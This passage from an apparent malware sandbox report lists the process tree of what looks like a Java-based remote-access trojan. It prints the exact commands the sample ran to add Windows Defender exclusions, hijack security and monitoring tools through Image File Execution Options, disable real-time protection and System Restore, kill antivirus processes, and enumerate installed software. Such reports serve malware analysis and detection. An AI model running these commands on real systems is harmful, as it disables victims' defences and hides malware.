      - Drops desktop.ini file(s)
      - Views/modifies file attributes
      PID:1828

  [2] C:\Windows\system32\attrib.exe
      attrib -s -r C:\Users\Admin\plstY
      - Views/modifies file attributes
      PID:1180

  [2] C:\Windows\system32\attrib.exe
      attrib +s +r C:\Users\Admin\plstY
      - Views/modifies file attributes
      PID:1840

  [2] C:\Windows\system32\attrib.exe
      attrib +h C:\Users\Admin\plstY
      - Views/modifies file attributes
      PID:1776

  [2] C:\Windows\system32\attrib.exe
      attrib +h +s +r C:\Users\Admin\plstY\oxPAo.class
      - Views/modifies file attributes
      PID:1752

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      - Suspicious use of WriteProcessMemory
      PID:1628

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
        PID:1868

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
        PID:1476

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
      PID:1560

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\plstY','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\plstY\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
      - Suspicious behavior: EnumeratesProcesses
      PID:1540

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1604

  [2] C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
      - Kills process with taskkill
      PID:1876

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1960

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
      PID:1940

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
      PID:2032

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1992

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
      PID:1548

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1012

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
      PID:1504

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1632

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:744

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
      PID:1332

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1796

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
      PID:1824

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1852

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1904

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
        PID:1784

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
        PID:1932

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
      PID:1920

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:2040

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
      PID:2016

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:324

  [2] C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
      - Kills process with taskkill
      PID:1380

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      PID:1900

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1912

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      PID:1620

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1788

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1040

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
        PID:1484

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
        PID:1560

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1060

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      PID:464

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      PID:1992

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1624

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1516

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:744

  [2] C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
      - Kills process with taskkill
      PID:1756

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1496

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1180

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1476

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
        PID:1104

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
        PID:2040

  [2] C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
      PID:1920

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1900

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
        PID:652

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
        PID:572

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1776

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
        PID:1948

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
        PID:1608

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1824

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
        PID:296

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
        PID:1076

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1752

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
        PID:1940

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
        PID:1976

  [2] C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
      - Kills process with taskkill
      PID:1568

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1576

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
        PID:1772

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
        PID:1484

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1560

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
        PID:1796

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
        PID:1856

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1496

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
        PID:1176

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
        PID:1180

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1548

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
        PID:1920

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
        PID:1780

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:652

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
        PID:1340

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
        PID:1912

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:296

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
        PID:1924

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
        PID:1692

  [2] C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
      - Kills process with taskkill
      PID:464

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1684

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
        PID:1332

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
        PID:2016

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:2044

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
        PID:1756

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
        PID:456

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1380

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
        PID:1012

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
        PID:1860

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1864

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
        PID:1944

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
        PID:1856

  [2] C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
      - Kills process with taskkill
      PID:672

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1624

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
        PID:1928

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
        PID:1552

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1780

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
        PID:1036

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
        PID:1340

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1912

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
        PID:1940

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
        PID:2004

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1916

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
        PID:1772

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
        PID:1932

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1388

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
        PID:1332

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
        PID:1632

  [2] C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
      - Kills process with taskkill
      PID:464

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:540

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
        PID:1396

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
        PID:1456

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1816

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
        PID:1868

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
        PID:1936

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1552

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
        PID:1620

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
        PID:1608

  [2] C:\Windows\system32\cmd.exe
      cmd.exe
      PID:1344

    [3] C:\Windows\system32\reg.exe
        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
        PID:1692
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1836
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:844
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1580
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1908
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:464
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:520
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1340
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1692
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:320
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1972
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1396
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1508
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:744
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:1772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1332
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1580
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:1592
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1976
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1472
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1204
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:2012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1736
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:784
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1956
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:1540
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1940
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1840
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1960
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1060
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1472
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:2012
-
-
-
